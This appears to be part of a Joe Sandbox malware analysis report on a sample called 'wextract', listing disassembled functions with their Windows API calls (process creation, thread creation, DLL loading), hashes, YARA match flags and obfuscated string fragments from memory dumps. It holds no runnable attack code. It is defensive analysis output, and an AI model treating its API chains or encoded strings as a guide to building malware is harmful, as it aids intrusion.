                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 144b77eb1b96bea066d17a58148f0359b2592e6fa48086db26fed8ab2bf9ac8a
                                                                                  • Instruction ID: 895093db4622d9f1baaa0d5253eb251e0d48ab8d7f867ef9014f32295fffae49
                                                                                  • Opcode Fuzzy Hash: 144b77eb1b96bea066d17a58148f0359b2592e6fa48086db26fed8ab2bf9ac8a
                                                                                  • Instruction Fuzzy Hash: C431AAB0A00704BBD714DFA4D885FEBB7B9EB84704F50451DF51DAB281C778AA50CBA8
                                                                                  Function 0041F1D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 3164a27ff8a374a537abb796ec3f642e5818dfd035117a462e29af70c95a1c44
                                                                                  • Instruction ID: dc6ee56215d546e453e9fb322aab35fb67e68d5dde25da2c550454ddb3d1bf9d
                                                                                  • Opcode Fuzzy Hash: 3164a27ff8a374a537abb796ec3f642e5818dfd035117a462e29af70c95a1c44
                                                                                  • Instruction Fuzzy Hash: C4311EB5A0060AAFDB00DFD8D8809EFB7B9FF88304B108559E915AB214D775AE45CBA4
                                                                                  Function 0041F1D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: b9444e21621b113e5a5248535e051aa661c95f6a798611e4b0f598fd5ed42565
                                                                                  • Instruction ID: 88f87cf40c89599cd57904cf50529f9d5849df4b6e6527c5a6ce1e706f715e07
                                                                                  • Opcode Fuzzy Hash: b9444e21621b113e5a5248535e051aa661c95f6a798611e4b0f598fd5ed42565
                                                                                  • Instruction Fuzzy Hash: B9310FB5A0060A9FDB00DFD8D8809EFB7B9FF88304B108559E915EB214D775AE45CBA4
                                                                                  Function 004141C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414232
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a024970c4561fa55472800a4d5645d921e68bffc055f8e666addb27ae271a54c
                                                                                  • Instruction ID: abede8b561fe77ec4660d5311ebb2dd431135ca8c5c25437e75dad109ee4795d
                                                                                  • Opcode Fuzzy Hash: a024970c4561fa55472800a4d5645d921e68bffc055f8e666addb27ae271a54c
                                                                                  • Instruction Fuzzy Hash: 4C010CB9E0020DABDB10EAA5EC42FDEB3B89B54308F40419AA90897241F635EB55CB95
                                                                                  Function 004294E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,00417FBE,00000010,?,?,?,00000044,?,00000010,00417FBE,?,00000000,?), ref: 00429543
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 7b044b12ce0357a0dc3c41772e90e0c671fe0e82311312be5380dfc812b911d2
                                                                                  • Instruction ID: 3992e734cdc78d08ff5464572baea4da7a5bf8c08d44b50aae77fe4db1840008
                                                                                  • Opcode Fuzzy Hash: 7b044b12ce0357a0dc3c41772e90e0c671fe0e82311312be5380dfc812b911d2
                                                                                  • Instruction Fuzzy Hash: 1901D2B2204108BBDB44DF89DC81EEB77EDAF8D714F408209BA09E3241D634F8518BA4
                                                                                  Function 00409B20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409B65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: d346da6d370f7233eeaa687bfbc99355b93133abfdc69e674b17e04ea019fc82
                                                                                  • Instruction ID: 7c197f9667940dc988b802b39719b868243296d0ff210f6eef07d554726afe53
                                                                                  • Opcode Fuzzy Hash: d346da6d370f7233eeaa687bfbc99355b93133abfdc69e674b17e04ea019fc82
                                                                                  • Instruction Fuzzy Hash: 09F0657338021436D22071AAAC02FD7B29CCBD07A5F14052AF60DEB1C1D9AAB84142ED
                                                                                  Function 00409B1B Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409B65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: dd4075ceaf1d1ec0ef357ac6d7a22e87a4be27b8558fb0e666b6027fe9adfd25
                                                                                  • Instruction ID: 5d9199d75f4b7650f0635bf48b1bd79c467c9bd6064a102e13dae2bb3d70a895
                                                                                  • Opcode Fuzzy Hash: dd4075ceaf1d1ec0ef357ac6d7a22e87a4be27b8558fb0e666b6027fe9adfd25
                                                                                  • Instruction Fuzzy Hash: E4F0657338431476D22072699C43FD7B65CCB90755F54012AF64DAB1C1D9AAB84182AD
                                                                                  Function 00429450 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5C468B5C,00000007,00000000,00000004,00000000,00413A42,000000F4), ref: 0042948F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 5f68cb7d82b81062bbfcc78d4a111bf76dc2e6db85f06c16af699c288adbcfc5
                                                                                  • Instruction ID: fc69b8ecb9723d8cc45c761d263a811aa50f5afc95105cdda19c8fc406e88f91
                                                                                  • Opcode Fuzzy Hash: 5f68cb7d82b81062bbfcc78d4a111bf76dc2e6db85f06c16af699c288adbcfc5
                                                                                  • Instruction Fuzzy Hash: 4BE06D716042047BC610EE59DC41E9B77ACDFC5714F408419F909A7241C675BD108AB9
                                                                                  Function 00429400 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00411696,?,004253D1,00411696,004253BF,004253D1,?,00411696,004253BF,00001000,?,?,00000000), ref: 0042943F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 1d9f2867c6562e32d1f2ed2233ac2ef1fb1a165fc89a58d93122af4896114f78
                                                                                  • Instruction ID: 7dd337fee36c1de8651837a8b3e57473fe6dbcb9acf368cbf0841a62b93bba2b
                                                                                  • Opcode Fuzzy Hash: 1d9f2867c6562e32d1f2ed2233ac2ef1fb1a165fc89a58d93122af4896114f78
                                                                                  • Instruction Fuzzy Hash: BDE06D716042047BC610EE59EC41E9B77ACEFC9714F40441AFD09A7242C634B9108AB9
                                                                                  Function 00418000 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0041802C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 58cdef567bb3dd5ae96781c6e6594b62603161ad5ea113c9276a644298411929
                                                                                  • Instruction ID: 85a356e6012f67203041c6afb3cfbff51a96c8ebc60c08e47654a07ca4ff1ee9
                                                                                  • Opcode Fuzzy Hash: 58cdef567bb3dd5ae96781c6e6594b62603161ad5ea113c9276a644298411929
                                                                                  • Instruction Fuzzy Hash: BDE0D8712002081AE62055689D45BA2334897487A4F490755BC1C9B7C2D97EFD814154
                                                                                  Function 00417FFA Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0041802C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: faddc056ea9f8aafa0378de82b295ada4625adeeabc12eec1ab6dc1b1f5c9e59
                                                                                  • Instruction ID: 178ba5aa98897e86710014cca67b27d3af545ecc9e0e11def49d28c6121008ed
                                                                                  • Opcode Fuzzy Hash: faddc056ea9f8aafa0378de82b295ada4625adeeabc12eec1ab6dc1b1f5c9e59
                                                                                  • Instruction Fuzzy Hash: 62E0D8711002041FE6249678CD45BA633149B5C3E4F594769BC2CDB7D2D67EED838118
                                                                                  Function 00417DE7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00411980,00427CFE,004253BF,0041194D), ref: 00417E23
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 1e17604c097dd2c8ede8bd772579c2429df0cbdc1d4750585eccb484aa604e80
                                                                                  • Instruction ID: f735a2b1068ec029338f065ec7b7219349aa5a2341a24279a7f95f3f42de4575
                                                                                  • Opcode Fuzzy Hash: 1e17604c097dd2c8ede8bd772579c2429df0cbdc1d4750585eccb484aa604e80
                                                                                  • Instruction Fuzzy Hash: 9EE0CD71B843046EE600DAB49C06FD623548B54744F04417DF50CEB3D3D93A94518668
                                                                                  Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 00410A77
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                  • Instruction ID: b088549114f08ef57924123c6980e4de66cc88eb91d06d616aea47741faafbf7
                                                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                  • Instruction Fuzzy Hash: E6D0A977B4010C3AAA128584ACC1CFFB72CEB94AA6F004063FB08E2140E6628D020BB0
                                                                                  Function 00417DF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00411980,00427CFE,004253BF,0041194D), ref: 00417E23
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 9806e2be49c9d37021fa0424af27076b4e0a912c898b1e7ef2c84fde35927570
                                                                                  • Instruction ID: ae5b61f3b05ef3f5b2c3e24461657f822af88982025f9a3a546b8a1f5cf82283
                                                                                  • Opcode Fuzzy Hash: 9806e2be49c9d37021fa0424af27076b4e0a912c898b1e7ef2c84fde35927570
                                                                                  • Instruction Fuzzy Hash: CAD05EB16843083BE600A6B59C07F56328C8B54798F0844B9BA0CEB2D3ED7AF55085AD
                                                                                  Function 04602C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 467efb5314cfa0588645bdab8ccad61cc2861c6ba0674bd434bd70625ca14855
                                                                                  • Instruction ID: 2ba3719c8664add209febec9fd2b1dc01f00611abad10a96313439a53593240f
                                                                                  • Opcode Fuzzy Hash: 467efb5314cfa0588645bdab8ccad61cc2861c6ba0674bd434bd70625ca14855
                                                                                  • Instruction Fuzzy Hash: B6B09B719415C5C6FB55FB60460C71779006FD1705F19C066D2030796F5738D5D1E175

                                                                                  Non-executed Functions

                                                                                  Function 048E04E8 Relevance: .1, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5762dd9208c5a541e65c6335877f6d73e5715e75552489515d34240f8ab2d7a8
                                                                                  • Instruction ID: 77d3c90c26f676d9ed2db7a489bd37a5c59395ce0678c46a0b983d4a5c4d68da
                                                                                  • Opcode Fuzzy Hash: 5762dd9208c5a541e65c6335877f6d73e5715e75552489515d34240f8ab2d7a8
                                                                                  • Instruction Fuzzy Hash: 6441C271608B1D4FD368AF699081676B3E1FB8B314F500E2DC99AC3252EBB4F8468785
                                                                                  Function 0040DE61 Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 430848ae83f91a7998d78691c8bfb012a5a5f11f5e8ae9df8faee4d15a497c30
                                                                                  • Instruction ID: a12ba02d28cf478ec906c4d1c9b395771363fdac30aae0578f0fb61e37cbf699
                                                                                  • Opcode Fuzzy Hash: 430848ae83f91a7998d78691c8bfb012a5a5f11f5e8ae9df8faee4d15a497c30
                                                                                  • Instruction Fuzzy Hash: 53B00227F5911801D5345C4D7C812F4F364D397236D5432B7ED0CF76405487D55501DD
                                                                                  Function 048EDFCA Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  • Opcode ID: cf1fcd0e40b47d8a99a501ab745654497db228fb78b61a2b72f2f25ba9573528
                                                                                  • Instruction ID: 12d07f406ba28dedf8d7d8dc13a3a043f5d552378fccb6415dad9c352e6be58b
                                                                                  • Opcode Fuzzy Hash: cf1fcd0e40b47d8a99a501ab745654497db228fb78b61a2b72f2f25ba9573528
                                                                                  • Instruction Fuzzy Hash: BC9160F04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                  Function 048E3BE2 Relevance: 35.1, Strings: 28, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (,.9$*.7*$*/91$,*.7$,7)9$-)*7$/-09$/7("$/9_A$1Npw$7)7+$9NVN$9WM9$RQMT$Rpm6$T6)7$Tvcp$U59u$Xiiu$^|zr$kp6,$pr|9$qkvt$uux6$v09Z$|6--$|N|{$}vnj
                                                                                  • API String ID: 0-1351462709
                                                                                  • Opcode ID: d0591d68833f523f02c621825bb2fa117a38c8ad4e76a54f3fcf9cb93b1b6216
                                                                                  • Instruction ID: 7dd2a547dc2da17cccf4efe816bfd7d9aa4c1a7e13039310806a26cb9d97effd
                                                                                  • Opcode Fuzzy Hash: d0591d68833f523f02c621825bb2fa117a38c8ad4e76a54f3fcf9cb93b1b6216
                                                                                  • Instruction Fuzzy Hash: BF2160B040070CEBCF11DF85E1909DDBB71FB06384F919428E84A6E248CB358A25CB8A
                                                                                  Function 048E3AB0 Relevance: 26.3, Strings: 21, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $10g$(9$(s4(10p=,,05?=(532s$4(10w$10p=,,05?=(532s$+9>,$,05?$,2;p$-alr$-alr$2s/5$4=2;$9g*a$;298$;9s=$=(53$=;9s$>og-$alrk$dp=,$ep51$p51=$q9$?$vsvg
                                                                                  • API String ID: 0-798368912
                                                                                  • Opcode ID: d94663b36617f30cd0da4c594e9cda41403c555f30f75e58b3b12fcb59f36475
                                                                                  • Instruction ID: 189829432d390e1fce1507a9863e9b60ad491caff1c5a1c1f9c791f88dd48631
                                                                                  • Opcode Fuzzy Hash: d94663b36617f30cd0da4c594e9cda41403c555f30f75e58b3b12fcb59f36475
                                                                                  • Instruction Fuzzy Hash: C831B8B8808788DACF14DF58D840ADDBB70FF05310F844599E808AF285C6758A46CB8A
                                                                                  Function 04602890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: ca6aa2ad220aa809e57d5b569c147bf5c8fed27a1ee47ef118d96193e5e0482e
                                                                                  • Instruction ID: 4d49d23e8525422faeb2fd943c7c4a5af387291c742f771e6f34074851515eb1
                                                                                  • Opcode Fuzzy Hash: ca6aa2ad220aa809e57d5b569c147bf5c8fed27a1ee47ef118d96193e5e0482e
                                                                                  • Instruction Fuzzy Hash: 2151F7B6A00156BFDB25DF98889497FF7B8BF08205714C1A9E495D3681F234FE449BE0
                                                                                  Function 045F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04634655
                                                                                  • ExecuteOptions, xrefs: 046346A0
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04634742
                                                                                  • Execute=1, xrefs: 04634713
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 046346FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04634787
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04634725
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: b019b57aeba0ceb53ccc2ab65bf774520ff6faf7abb5be4529ffe80dec526736
                                                                                  • Instruction ID: e61f9859832a7bd760238d130d8674f8aa514a656da5a677652e290b4e0c59aa
                                                                                  • Opcode Fuzzy Hash: b019b57aeba0ceb53ccc2ab65bf774520ff6faf7abb5be4529ffe80dec526736
                                                                                  • Instruction Fuzzy Hash: 5351E531600219AAEF14ABA4EC95FAE77A8FF4C305F0404A9E605A7190FB70BA45EE55
                                                                                  Function 0460B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                  • Instruction ID: cc0de513de5bbb35df6ec095f6ea4d19a1a7ad16e33b9b28bb91c752ab4a5ce8
                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                  • Instruction Fuzzy Hash: 4981BF30E152498EDF2C8EE8C8517BFBBB1AF65B10F18C559D861A73D0E730B8418B54
                                                                                  Function 045EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 0463031E
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046302BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046302E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
